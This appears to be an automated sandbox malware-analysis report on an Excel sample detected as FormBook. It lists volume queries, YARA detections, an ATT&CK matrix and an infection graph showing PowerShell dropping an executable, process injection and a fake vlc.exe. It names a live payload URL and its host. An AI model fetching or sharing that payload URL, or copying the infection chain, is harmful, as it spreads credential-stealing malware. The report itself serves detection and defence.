          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000001E.00000002.483476185.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001E.00000002.484446432.0000000000FA0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.469007949.0000000003B41000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000019.00000002.468368028.00000000043B1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.534769301.0000000001170000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000020.00000002.491474421.00000000033E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 30.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 29.2.oftmhayq.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation111Registry Run Keys / Startup Folder11Process Injection412Disable or Modify Tools11Credential API Hooking1File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScripting2Boot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Deobfuscate/Decode Files or Information1Input Capture1System Information Discovery124Remote Desktop ProtocolCredential API Hooking1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution3Logon Script (Windows)Logon Script (Windows)Scripting2Security Account ManagerSecurity Software Discovery241SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsPowerShell3Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information31NTDSVirtualization/Sandbox Evasion5Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol22SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing3LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonRootkit1Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading111DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion5Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Process Injection412/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 323692 Sample: 5901777.xls Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 45 Multi AV Scanner detection for domain / URL 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus detection for dropped file 2->49 51 12 other signatures 2->51 9 powershell.exe 14 21 2->9         started        14 powershell.exe 21 2->14         started        16 EXCEL.EXE 27 22 2->16         started        process3 dnsIp4 43 sparepartiran.com 162.223.88.131, 49743, 49744, 80 COLOUPUS United States 9->43 41 C:\Users\Public\oftmhayq.exe, PE32 9->41 dropped 61 Drops PE files to the user root directory 9->61 63 Powershell drops PE file 9->63 18 oftmhayq.exe 4 9->18         started        21 conhost.exe 9->21         started        23 oftmhayq.exe 1 5 14->23         started        26 conhost.exe 14->26         started        28 splwow64.exe 16->28         started        file5 signatures6 process7 file8 53 Antivirus detection for dropped file 18->53 55 Machine Learning detection for dropped file 18->55 57 Tries to detect virtualization through RDTSC time measurements 18->57 30 oftmhayq.exe 18->30         started        39 C:\Users\user\AppData\Roaming\...\vlc.exe, PE32 23->39 dropped 59 Injects a PE file into a foreign processes 23->59 33 oftmhayq.exe 23->33         started        signatures9 process10 signatures11 65 Modifies the context of a thread in another process (thread injection) 30->65 67 Maps a DLL or memory area into another process 30->67 69 Queues an APC in another process (thread injection) 30->69 35 explorer.exe 33->35 injected process12 process13 37 vlc.exe 35->37         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          5901777.xls24%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\oftmhayq.exe100%AviraHEUR/AGEN.1136389
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%AviraHEUR/AGEN.1136389
          C:\Users\Public\oftmhayq.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe100%Joe Sandbox ML

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          29.0.oftmhayq.exe.870000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          25.2.oftmhayq.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          30.2.oftmhayq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          29.2.oftmhayq.exe.870000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          32.2.vlc.exe.70000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          30.0.oftmhayq.exe.8a0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          29.2.oftmhayq.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          25.0.oftmhayq.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          24.0.oftmhayq.exe.7c0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          30.2.oftmhayq.exe.8a0000.1.unpack100%AviraHEUR/AGEN.1136389Download File
          24.2.oftmhayq.exe.7c0000.0.unpack100%AviraHEUR/AGEN.1136389Download File
          32.0.vlc.exe.70000.0.unpack100%AviraHEUR/AGEN.1136389Download File

          Domains

          SourceDetectionScannerLabelLink
          sparepartiran.com11%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://sparepartiran.com/js/2Q/50%Avira URL Cloudsafe
          http://www.fonts.comat0%Avira URL Cloudsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://sparepartiran.com11%VirustotalBrowse
          http://sparepartiran.com0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.carterandcone.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cnp0%Avira URL Cloudsafe
          http://www.sakkal.como0%Avira URL Cloudsafe
          http://www.ascendercorp.com/typedesigners.html:0%Avira URL Cloudsafe
          http://www.urwpp.deocS0%Avira URL Cloudsafe
          http://www.fontbureau.coma770%Avira URL Cloudsafe
          http://www.fontbureau.comldva0%Avira URL Cloudsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          http://www.carterandcone.comR0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.founder.com.cn/cnn-u0%Avira URL Cloudsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.sakkal.comc0%Avira URL Cloudsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.urwpp.deX0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://www.galapagosdesign.com/0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://www.carterandcone.comegu0%Avira URL Cloudsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://sparepartiran.com/js/2Q/5901777.pdf.exe0yRO0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
          http://en.wikip0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/I7s0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn/0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          sparepartiran.com
          		162.223.88.131
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://sparepartiran.com/js/2Q/5901777.pdf.exetrue
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.fontbureau.com/designersGoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
            		high
            http://www.fontbureau.com/designers/?oftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
              		high
              http://www.founder.com.cn/cn/bTheoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://sparepartiran.com/js/2Q/5powershell.exe, 00000015.00000002.433516174.000001F6CD269000.00000004.00000001.sdmptrue
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designers?oftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                		high
                http://www.fonts.comatoftmhayq.exe, 00000018.00000003.419447690.0000000005A6D000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://contoso.com/Licensepowershell.exe, 00000015.00000002.426042262.000001F6CC6A1000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.tiro.comexplorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designersexplorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.fontbureau.com/designers/Ooftmhayq.exe, 00000018.00000003.428462060.0000000005A6B000.00000004.00000001.sdmpfalse
                    		high
                    http://sparepartiran.compowershell.exe, 00000014.00000002.434548786.000001D20B76E000.00000004.00000001.sdmp, powershell.exe, 00000015.00000002.431327100.000001F6CD016000.00000004.00000001.sdmptrue
                    • 11%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.goodfont.co.kroftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.carterandcone.comoftmhayq.exe, 00000018.00000003.425705477.0000000005A3A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheoftmhayq.exe, 00000018.00000002.474381892.0000000006D32000.00000004.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmoftmhayq.exe, 00000018.00000002.472455685.0000000005C10000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000002.471325129.0000000006490000.00000002.00000001.sdmp, oftmhayq.exe, 00000019.00000003.431695720.00000000063CD000.00000004.00000001.sdmp, explorer.exe, 0000001F.00000000.512279022.0000000008B40000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
